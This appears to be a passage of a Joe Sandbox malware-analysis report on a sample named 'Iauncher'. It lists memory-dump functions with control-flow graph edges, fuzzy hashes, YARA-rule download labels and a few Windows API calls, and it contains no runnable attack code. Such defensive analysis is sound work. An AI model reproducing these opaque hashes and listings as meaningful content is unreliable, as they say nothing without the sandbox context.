                                                                                                                                                    control_flow_graph 1963 5dba520-5dbac60 1966 5dbb143-5dbb1ac 1963->1966 1967 5dbac66-5dbac6b 1963->1967 1974 5dbb1b3-5dbb23b 1966->1974 1967->1966 1968 5dbac71-5dbac8e 1967->1968 1968->1974 1975 5dbac94-5dbac98 1968->1975 2018 5dbb246-5dbb2c6 1974->2018 1976 5dbac9a-5dbaca4 call 5dba530 1975->1976 1977 5dbaca7-5dbacab 1975->1977 1976->1977 1981 5dbacba-5dbacc1 1977->1981 1982 5dbacad-5dbacb7 call 5dba530 1977->1982 1984 5dbaddc-5dbade1 1981->1984 1985 5dbacc7-5dbacf7 1981->1985 1982->1981 1988 5dbade9-5dbadee 1984->1988 1989 5dbade3-5dbade7 1984->1989 1996 5dbb4c6-5dbb4ec 1985->1996 1998 5dbacfd-5dbadd0 call 5dba53c * 2 1985->1998 1993 5dbae00-5dbae30 call 5dba548 * 3 1988->1993 1989->1988 1992 5dbadf0-5dbadf4 1989->1992 1995 5dbadfa-5dbadfd 1992->1995 1992->1996 1993->2018 2019 5dbae36-5dbae39 1993->2019 1995->1993 2007 5dbb4ee-5dbb4fa 1996->2007 2008 5dbb4fc 1996->2008 1998->1984 2027 5dbadd2 1998->2027 2012 5dbb4ff-5dbb504 2007->2012 2008->2012 2034 5dbb2cd-5dbb34f 2018->2034 2019->2018 2022 5dbae3f-5dbae41 2019->2022 2022->2018 2025 5dbae47-5dbae7c 2022->2025 2025->2034 2035 5dbae82-5dbae8b 2025->2035 2027->1984 2040 5dbb357-5dbb3d9 2034->2040 2036 5dbafee-5dbaff2 2035->2036 2037 5dbae91-5dbaeeb call 5dba548 * 2 call 5dba558 * 2 2035->2037 2039 5dbaff8-5dbaffc 2036->2039 2036->2040 2083 5dbaefd 2037->2083 2084 5dbaeed-5dbaef6 2037->2084 2044 5dbb002-5dbb008 2039->2044 2045 5dbb3e1-5dbb40e 2039->2045 2040->2045 2048 5dbb00a 2044->2048 2049 5dbb00c-5dbb041 2044->2049 2056 5dbb415-5dbb495 2045->2056 2054 5dbb048-5dbb04e 2048->2054 2049->2054 2054->2056 2057 5dbb054-5dbb05c 2054->2057 2117 5dbb49c-5dbb4be 2056->2117 2062 5dbb05e-5dbb062 2057->2062 2063 5dbb063-5dbb065 2057->2063 2062->2063 2068 5dbb0c7-5dbb0cd 2063->2068 2069 5dbb067-5dbb08b 2063->2069 2077 5dbb0cf-5dbb0ea 2068->2077 2078 5dbb0ec-5dbb11a 2068->2078 2102 5dbb08d-5dbb092 2069->2102 2103 5dbb094-5dbb098 2069->2103 2094 5dbb122-5dbb12e 2077->2094 2078->2094 2086 5dbaf01-5dbaf03 2083->2086 2084->2086 2090 5dbaef8-5dbaefb 2084->2090 2092 5dbaf0a-5dbaf0e 2086->2092 2093 5dbaf05 2086->2093 2090->2086 2099 5dbaf1c-5dbaf22 2092->2099 2100 5dbaf10-5dbaf17 2092->2100 2093->2092 2094->2117 2118 5dbb134-5dbb140 2094->2118 2106 5dbaf2c-5dbaf31 2099->2106 2107 5dbaf24-5dbaf2a 2099->2107 2105 5dbafb9-5dbafbd 2100->2105 2109 5dbb0a4-5dbb0b5 2102->2109 2103->1996 2110 5dbb09e-5dbb0a1 2103->2110 2115 5dbafbf-5dbafd9 2105->2115 2116 5dbafdc-5dbafe8 2105->2116 2113 5dbaf37-5dbaf3d 2106->2113 2107->2113 2152 5dbb0b7 call 5dbb550 2109->2152 2153 5dbb0b7 call 5dbb560 2109->2153 2110->2109 2121 5dbaf3f-5dbaf41 2113->2121 2122 5dbaf43-5dbaf48 2113->2122 2115->2116 2116->2036 2116->2037 2117->1996 2128 5dbaf4a-5dbaf5c 2121->2128 2122->2128 2125 5dbb0bd-5dbb0c5 2125->2094 2133 5dbaf5e-5dbaf64 2128->2133 2134 5dbaf66-5dbaf6b 2128->2134 2135 5dbaf71-5dbaf78 2133->2135 2134->2135 2139 5dbaf7a-5dbaf7c 2135->2139 2140 5dbaf7e 2135->2140 2143 5dbaf83-5dbaf8e 2139->2143 2140->2143 2144 5dbafb2 2143->2144 2145 5dbaf90-5dbaf93 2143->2145 2144->2105 2145->2105 2147 5dbaf95-5dbaf9b 2145->2147 2148 5dbaf9d-5dbafa0 2147->2148 2149 5dbafa2-5dbafab 2147->2149 2148->2144 2148->2149 2149->2105 2151 5dbafad-5dbafb0 2149->2151 2151->2105 2151->2144 2152->2125 2153->2125
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hq$Hq$Hq$Hq$Hq
                                                                                                                                                    • API String ID: 0-3799487529
                                                                                                                                                    • Opcode ID: c7f553cdb7ef919d2ee9618bcc6d8eeaa189a41ebf2cb60bcf02728004752cee
                                                                                                                                                    • Instruction ID: 737f3291b55811f933b89279f8538ab5d432d9539ef9d0f501db5da8f357927d
                                                                                                                                                    • Opcode Fuzzy Hash: c7f553cdb7ef919d2ee9618bcc6d8eeaa189a41ebf2cb60bcf02728004752cee
                                                                                                                                                    • Instruction Fuzzy Hash: 3C325F70A00218CFEB54DF68C9917AEBBF3FF88300F14816AD44AAB255DB749D45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA0040 Relevance: 2.7, Instructions: 2744COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b53c704869a10c09617f400d5c125f022e5773f9c47114b3920caf55d241ece9
                                                                                                                                                    • Instruction ID: afbf44a6800679adc18ae38d7201132353cb2916ce0d3e7098f3deeab722d320
                                                                                                                                                    • Opcode Fuzzy Hash: b53c704869a10c09617f400d5c125f022e5773f9c47114b3920caf55d241ece9
                                                                                                                                                    • Instruction Fuzzy Hash: AA53BB75E016298FCB21DF24C994B99B7B2BF8A305F0091EAD50DB7260EB716E85CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA0021 Relevance: 2.0, Instructions: 1954COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f5cc776801635e3d8171ada83d88242441ef9edcffbe64a30b3586e8d6f9f0b2
                                                                                                                                                    • Instruction ID: 0612db606e613854cb3311f87cdcd32e93865a88bf458ea15a99187eb4ee2620
                                                                                                                                                    • Opcode Fuzzy Hash: f5cc776801635e3d8171ada83d88242441ef9edcffbe64a30b3586e8d6f9f0b2
                                                                                                                                                    • Instruction Fuzzy Hash: AA23CE75A006298FCB21EF24DD54B99B7B2FF8A301F0091EAD54DA7260EB716E85CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 075EF478 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3685325691.00000000075E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_75e0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5048bc7bbde0ad80d76d0a723ff237546664a5cde5d9ea5a9d931d09a257165d
                                                                                                                                                    • Instruction ID: 3a59e15c4ed19bacba5ffa3a72344d34dc0d2b5357fc31f8040e98f39fc65cce
                                                                                                                                                    • Opcode Fuzzy Hash: 5048bc7bbde0ad80d76d0a723ff237546664a5cde5d9ea5a9d931d09a257165d
                                                                                                                                                    • Instruction Fuzzy Hash: 53F16FB0A0030ADFDB58DFA9C844B9DBBF5FF48304F158559E409AF2A5DB70A945CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9CFC Relevance: .9, Instructions: 928COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f86d4344f37197f4617fff85ae1545c1854cce42ffe09f0c94912b80912a5646
                                                                                                                                                    • Instruction ID: f94d9789d24d34838eb1214a98ea6b23a68d0857114e62873d09aa84cbdf7922
                                                                                                                                                    • Opcode Fuzzy Hash: f86d4344f37197f4617fff85ae1545c1854cce42ffe09f0c94912b80912a5646
                                                                                                                                                    • Instruction Fuzzy Hash: 9E92E035D006299FCB26EF64C844BD9BBB6BF4A304F0191E9E50D6B261DB71AB84DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA7A88 Relevance: .9, Instructions: 866COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4507ab3ece86d1acd183f9ac44e094dec026f2a5e0bf0cb06c8524e67d138975
                                                                                                                                                    • Instruction ID: a86234d937f266ec0c530579adab56398b35ba91001de8788c1531b2d00cb7f2
                                                                                                                                                    • Opcode Fuzzy Hash: 4507ab3ece86d1acd183f9ac44e094dec026f2a5e0bf0cb06c8524e67d138975
                                                                                                                                                    • Instruction Fuzzy Hash: E292D235D006699FCB21EF64C898A9DBBB6FF49300F0092EAE50967261DB319ED5CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAB081 Relevance: .8, Instructions: 844COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 828c3ef46c6a3057260ba180a8f9a8983d8a276a076917e616247332ab97ecbc
                                                                                                                                                    • Instruction ID: 19dcc6b64ce610de3e1c2e65744b7f3e68eefca769cac23af3633cbd947806a1
                                                                                                                                                    • Opcode Fuzzy Hash: 828c3ef46c6a3057260ba180a8f9a8983d8a276a076917e616247332ab97ecbc
                                                                                                                                                    • Instruction Fuzzy Hash: E582E235D00A298FCB22DF64CC54BDABBB2EF4A305F0591E5E508AB261DB719E95CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BFE858 Relevance: .5, Instructions: 498COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6ff5c1ac6e0d0cf2a7d6ab278d9ce80cd99e112a1e681ae266ef54f3a82c7d3f
                                                                                                                                                    • Instruction ID: 5141569cd27910889d6e7d586646323bed84056741eafbe7bb221f6c31b78d36
                                                                                                                                                    • Opcode Fuzzy Hash: 6ff5c1ac6e0d0cf2a7d6ab278d9ce80cd99e112a1e681ae266ef54f3a82c7d3f
                                                                                                                                                    • Instruction Fuzzy Hash: 32120674E04129CBDB24DFA5C9A4BADBBB1FB49310F1094E6E60AA73A1D730D985CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF8F3F Relevance: .5, Instructions: 480COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f01c4e1c549df7a5999de92390a64d6f617f860d6d6654f5d75725b15731c4da
                                                                                                                                                    • Instruction ID: 78480ea06f8db5f1cc40ac45e80adad2331df4c5ceb2a624d572f744b7746740
                                                                                                                                                    • Opcode Fuzzy Hash: f01c4e1c549df7a5999de92390a64d6f617f860d6d6654f5d75725b15731c4da
                                                                                                                                                    • Instruction Fuzzy Hash: 08220735D00219DFDF11EFA4D854AEDBBB1FF59300F1196AAE509AB260EB309A95CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CADC49 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d2294bca0a8d663f1d98f1ef8286cc4f97153f1cf601ecd1f305afe5bb47886e
                                                                                                                                                    • Instruction ID: 0dd990c689da15dd21c263c3c81922e37964631e9a0f86e5031190a407431f5c
                                                                                                                                                    • Opcode Fuzzy Hash: d2294bca0a8d663f1d98f1ef8286cc4f97153f1cf601ecd1f305afe5bb47886e
                                                                                                                                                    • Instruction Fuzzy Hash: 6D121335D012299FDB26DF64C848BD9BBB6BF4A304F0191E5E50DAB261DB31AB84DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF7BA0 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 447a7ebc703d8aaecbec5fb545de6bfb5a58da8632750cfecc0de29342800e6b
                                                                                                                                                    • Instruction ID: 82aab4f2bc61559db06b0cca15c06d6acd63d7aa076496becc4314a35b68a50c
                                                                                                                                                    • Opcode Fuzzy Hash: 447a7ebc703d8aaecbec5fb545de6bfb5a58da8632750cfecc0de29342800e6b
                                                                                                                                                    • Instruction Fuzzy Hash: ACE1D635910229DFDB11DF68C848F99BBB5FF4A300F0185EAE54DA7261EB309A94CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DBAC28 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7d451335a90479403537f811d8cde77e9babf3608ce966fcd8a4c7139efee052
                                                                                                                                                    • Instruction ID: 14a88837d60b1e87cd52985b11e940360120bbd04836176555a85f276fb932a0
                                                                                                                                                    • Opcode Fuzzy Hash: 7d451335a90479403537f811d8cde77e9babf3608ce966fcd8a4c7139efee052
                                                                                                                                                    • Instruction Fuzzy Hash: 7AC12871A00218DFEB15DF65C880BDDBBF2FF89300F1485AAD44AAB255EB74D985CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF2550 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 227a614c218af7bcbbfc2e26476c1e26c7ba52fc854bad6de52b5e143c1652b4
                                                                                                                                                    • Instruction ID: c3dde026cbe4355060bb327138b85d981138795d5755865141d19d3df391544c
                                                                                                                                                    • Opcode Fuzzy Hash: 227a614c218af7bcbbfc2e26476c1e26c7ba52fc854bad6de52b5e143c1652b4
                                                                                                                                                    • Instruction Fuzzy Hash: 6D811374E012498FDB04DFE8D858AEEBBB1EF49311F10916AE511BB394DB349989CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF00E8 Relevance: .2, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6bcc7ff74cb89e97304d4cc3da2b212989d71f44b510378d5bf4bc924151f975
                                                                                                                                                    • Instruction ID: 9937cdaa2110b6e8c557b9d8276013e09a8f188fc2e9ed53deb70fed9457fa39
                                                                                                                                                    • Opcode Fuzzy Hash: 6bcc7ff74cb89e97304d4cc3da2b212989d71f44b510378d5bf4bc924151f975
                                                                                                                                                    • Instruction Fuzzy Hash: 0F513634E08218DFEB14CFA9D4587FEBAF1EF46315F0458A9E505A7290C7788A89CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CADAF0 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 98892c5c4ea9e4f92849caaf812aef0e2bb721eb5f4001a78b8fd4191154b55c
                                                                                                                                                    • Instruction ID: 8f427fd85373f31ef17f4379bcb70a4828638f6b8e5385b6dfe440915b02141e
                                                                                                                                                    • Opcode Fuzzy Hash: 98892c5c4ea9e4f92849caaf812aef0e2bb721eb5f4001a78b8fd4191154b55c
                                                                                                                                                    • Instruction Fuzzy Hash: 2241C275E002188BDF04EFE5D994AEDFBB2BF8A314F10A02AD506BB2A4DB345945CB14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0101F840 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2154 101f840-101f8cf GetCurrentProcess 2158 101f8d1-101f8d7 2154->2158 2159 101f8d8-101f90c GetCurrentThread 2154->2159 2158->2159 2160 101f915-101f949 GetCurrentProcess 2159->2160 2161 101f90e-101f914 2159->2161 2162 101f952-101f96a 2160->2162 2163 101f94b-101f951 2160->2163 2161->2160 2167 101f973-101f9a2 GetCurrentThreadId 2162->2167 2163->2162 2168 101f9a4-101f9aa 2167->2168 2169 101f9ab-101fa0d 2167->2169 2168->2169
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0101F8BE
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0101F8FB
                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 0101F938
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0101F991
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3676074296.0000000001010000.00000040.00000800.00020000.00000000.sdmp, Offset: 01010000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1010000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Current$ProcessThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2063062207-0
                                                                                                                                                    • Opcode ID: a87a6d444550eb153e9e0d0582f07509e1dbc25deedebb6b2415b53ef390c40e
                                                                                                                                                    • Instruction ID: c653584ab5ff43b09e1573b5fb08bc965caf55691b1b079148c7a4fe838083e8
                                                                                                                                                    • Opcode Fuzzy Hash: a87a6d444550eb153e9e0d0582f07509e1dbc25deedebb6b2415b53ef390c40e
                                                                                                                                                    • Instruction Fuzzy Hash: 045154B0D0030A8FEB14DFAAD548BAEBBF1FB48314F208459E419A7390DB746945CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA866C Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2402 9ca866c-9ca8692 2403 9ca8698-9ca869a 2402->2403 2404 9ca8997-9ca89bc 2402->2404 2405 9ca89c3-9ca89cf 2403->2405 2406 9ca86a0-9ca86c0 call 9ca7980 2403->2406 2404->2405 2411 9ca89d1-9ca89e8 2405->2411 2415 9ca8863-9ca8869 2406->2415 2416 9ca86c6-9ca87a2 2406->2416 2426 9ca89ef-9ca89f7 2411->2426 2418 9ca886f-9ca88e8 call 9ca777c call 9ca778c call 9ca799c 2415->2418 2419 9ca894d-9ca897c 2415->2419 2434 9ca89fe-9ca8a11 2416->2434 2448 9ca87a8-9ca885d call 9ca7990 2416->2448 2445 9ca88ea 2418->2445 2446 9ca88f3 2418->2446 2421 9ca8984-9ca898b 2419->2421 2422 9ca897f call 9ca799c 2419->2422 2422->2421 2426->2434 2434->2411 2445->2446 2446->2419 2448->2415 2448->2426
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q$(q
                                                                                                                                                    • API String ID: 0-2485164810
                                                                                                                                                    • Opcode ID: 367f66badb3020ddc8225de764e465a82bd62a2b416b84ced4e50a335fec6de4
                                                                                                                                                    • Instruction ID: dfed0a18221f30155aa154f658ebebcbddb1fa0592c47b395258fbe0056c238f
                                                                                                                                                    • Opcode Fuzzy Hash: 367f66badb3020ddc8225de764e465a82bd62a2b416b84ced4e50a335fec6de4
                                                                                                                                                    • Instruction Fuzzy Hash: 4591B031E003059FDB04ABA9D854BAEBBB6FFC8300F148169E519AB391DF349D41CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8260 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 3015 9ca8260-9ca8280 3016 9ca8341-9ca8366 3015->3016 3017 9ca8286-9ca8288 3015->3017 3022 9ca836d-9ca83f6 3016->3022 3018 9ca828a-9ca828e 3017->3018 3019 9ca8290-9ca8297 3017->3019 3018->3019 3020 9ca829a-9ca829e 3018->3020 3020->3022 3023 9ca82a4-9ca82c0 3020->3023 3038 9ca83f8-9ca83fe 3022->3038 3039 9ca8401-9ca8441 3022->3039 3024 9ca82c2-9ca82d2 3023->3024 3025 9ca82d4-9ca82d6 3023->3025 3027 9ca82d9-9ca8301 3024->3027 3025->3027 3033 9ca8308-9ca8329 call 9ca7750 3027->3033 3036 9ca832e-9ca833e 3033->3036 3038->3039 3041 9ca8447-9ca8452 3039->3041 3042 9ca845b-9ca8478 3041->3042 3043 9ca8454-9ca845a 3041->3043 3043->3042
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (q$(q
                                                                                                                                                    • API String ID: 0-2485164810
                                                                                                                                                    • Opcode ID: 5612c1133b2864378d91e69bff233a7a8c27fe67895456a4705f4711b9607f91
                                                                                                                                                    • Instruction ID: be81cde1cb29fecd1216635c6755da13d1929f1fb54ff0b1fc288bff380e99fe
                                                                                                                                                    • Opcode Fuzzy Hash: 5612c1133b2864378d91e69bff233a7a8c27fe67895456a4705f4711b9607f91
                                                                                                                                                    • Instruction Fuzzy Hash: 68610471E002099FDF14DFA9E884AEEBBF1FF88310F50812AE919A3250D7359951CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D63D48 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A1411C,02A5D8EC,?,00000000), ref: 05D63EA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3683984827.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d60000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                    • Opcode ID: c601245b380f2fa4e2575c7b07c74cfb1fdab0009310bb0d8fdefd6db07ee908
